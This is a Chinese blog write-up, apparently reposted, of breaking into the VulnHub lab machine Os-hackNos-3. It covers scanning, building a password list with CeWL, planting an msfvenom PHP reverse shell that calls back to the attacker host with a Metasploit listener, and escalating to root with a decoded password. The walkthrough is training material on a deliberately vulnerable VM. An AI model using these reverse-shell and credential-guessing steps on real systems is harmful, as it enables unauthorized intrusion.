vulnhub之Os-hackNos-3的实践

admin 2024年12月18日22:48:17评论7 views字数 953阅读3分10秒阅读模式

好久没做攻击实践了,今天看了一下,手里还攒着6个vulnhub的镜像,算了一下,整好春节前把它们都实践完,今天实践的是Os-hackNos-3,

用workstation导入成功,但是扫描不出来地址,换成virtualbox,

sudo netdiscover -r 192.168.56.0/24,

vulnhub之Os-hackNos-3的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.104,

vulnhub之Os-hackNos-3的实践

发现有http服务,名字叫WebSec,猜一个url,

http://192.168.56.104/websec/,下面发现个账户,

vulnhub之Os-hackNos-3的实践

从网页内容里爬密码,

sudo cewl http://192.168.56.104/websec/ > passwd.txt,

vulnhub之Os-hackNos-3的实践

从头开始试,到contact@hacknos.com/Securityx时成功,

再猜一个url,http://192.168.56.104/websec/admin,登录成功,

vulnhub之Os-hackNos-3的实践

找到一个能放反弹shell的地方,

vulnhub之Os-hackNos-3的实践

在kali攻击机上生成反弹shell代码,

sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.106 LPORT=4444 R > shell.php,

vulnhub之Os-hackNos-3的实践

把代码粘到页面上,保存提交,

vulnhub之Os-hackNos-3的实践

在kali攻击机上开个反弹shell的监听,

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.106
set LPORT 4444
run

在页面上再次点击保存,反弹shell就过来了,不是root,需要提权,

vulnhub之Os-hackNos-3的实践

先转成交互式shell,

python -c 'import pty; pty.spawn("/bin/bash")',

发现个blackdevil账户,又发现可能是密码的加密数据,

vulnhub之Os-hackNos-3的实践

去https://www.spammimic.com/spreadsheet.php?action=decode上解密,得到blackdevil的密码,Security@x@,

vulnhub之Os-hackNos-3的实践

切换到blackdevil,发现能再直接切到root,搞定,

vulnhub之Os-hackNos-3的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Os-hackNos-3的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月18日22:48:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Os-hackNos-3的实践https://cn-sec.com/archives/699626.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息